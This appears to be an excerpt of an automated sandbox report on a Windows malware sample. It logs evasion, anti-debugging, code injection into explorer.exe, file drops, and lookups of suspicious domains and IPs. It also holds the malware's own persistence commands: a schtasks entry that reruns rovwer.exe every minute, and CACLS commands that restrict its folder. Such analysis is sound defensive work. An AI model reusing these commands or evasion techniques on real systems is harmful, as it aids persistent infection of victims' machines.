Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3790.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6644.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6644.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: tiddsjj, 0000000B.00000002.378719538.0000000000B57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64
Opens the same file many times (likely Sandbox evasion)
Source: C:\Users\user\AppData\Local\Temp\453D.exe File opened: C:\Users\user\AppData\Local\Temp\0.txt count: 74827 Jump to behavior
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 2136 Thread sleep count: 646 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4760 Thread sleep count: 448 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4760 Thread sleep time: -44800s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5040 Thread sleep count: 300 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5040 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1336 Thread sleep count: 454 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4116 Thread sleep count: 282 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4044 Thread sleep count: 257 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 5456 Thread sleep time: -510000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 160 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 244 Thread sleep time: -1260000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 3424 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59FE.exe TID: 2888 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59FE.exe TID: 2888 Thread sleep time: -37000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6644.exe TID: 1920 Thread sleep count: 198 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe TID: 1096 Thread sleep count: 9999 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe TID: 5396 Thread sleep count: 389 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5004 Thread sleep count: 162 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5004 Thread sleep time: -97200000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5004 Thread sleep time: -600000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\59FE.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\59FE.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\6644.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 360000 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 646 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 448 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 454 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Window / User API: threadDelayed 9999 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Window / User API: threadDelayed 389
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PingboardCache\argq.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Registry key enumerated: More than 140 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 50000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 360000 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 816F.exe, 0000001A.00000002.533641862.0000000000844000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\w
Source: rovwer.exe, 0000000F.00000002.559360064.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000000.320883959.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000001.00000000.268150231.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: 2B4A.exe, 0000000C.00000002.553806034.0000000000870000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
Source: rovwer.exe, 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8e
Source: explorer.exe, 00000001.00000000.316628124.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Ven_NECVMWar&Prod_VMware_SAT
Source: explorer.exe, 00000001.00000000.268150231.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 816F.exe, 0000001A.00000002.552068120.00000000008B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00930D90 mov eax, dword ptr fs:[00000030h] 11_2_00930D90
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0093092B mov eax, dword ptr fs:[00000030h] 11_2_0093092B
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B483B3 push dword ptr fs:[00000030h] 11_2_00B483B3
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040CE09
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040ADB0 GetProcessHeap,HeapFree, 12_2_0040ADB0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_02520490 LdrInitializeThunk, 12_2_02520490
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004123F1 SetUnhandledExceptionFilter, 12_2_004123F1

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: cdn-102.anonfiles.com
Source: C:\Windows\explorer.exe Domain query: bitbucket.org
Source: C:\Windows\explorer.exe Domain query: bbuseruploads.s3.amazonaws.com
Source: C:\Windows\explorer.exe Domain query: u.to
Source: C:\Windows\explorer.exe Domain query: github.com
Source: C:\Windows\explorer.exe Domain query: raw.githubusercontent.com
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Domain query: o36fafs3sn6xou.com
Source: C:\Windows\explorer.exe Domain query: anonfiles.com
Source: C:\Windows\explorer.exe Domain query: hoteldostyk.com
Source: C:\Windows\explorer.exe Domain query: iplogger.com
Source: C:\Windows\explorer.exe Network Connect: 89.208.107.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: srshf.com
Source: C:\Windows\explorer.exe Domain query: transfer.sh
Source: C:\Windows\explorer.exe Domain query: 1ecosolution.it
Source: C:\Windows\explorer.exe Network Connect: 193.56.146.168 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: cdn-104.anonfiles.com
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 6644.exe.1.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Memory written: C:\Users\user\AppData\Local\Temp\86EE.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Memory written: C:\Users\user\AppData\Local\Temp\8C00.exe base: 400000 value starts with: 4D5A
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Thread created: C:\Windows\explorer.exe EIP: 3321A28 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Thread created: unknown EIP: 5851A28 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 44B008 Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\explorer.exe Memory written: PID: 5612 base: CDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5928 base: 7FF69FF38150 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 1768 base: CDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5080 base: 7FF69FF38150 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 3780 base: CDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 1648 base: CDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 812 base: CDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 6120 base: 7FF69FF38150 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5508 base: CDF380 value: 90 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\3790.exe Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E Jump to behavior
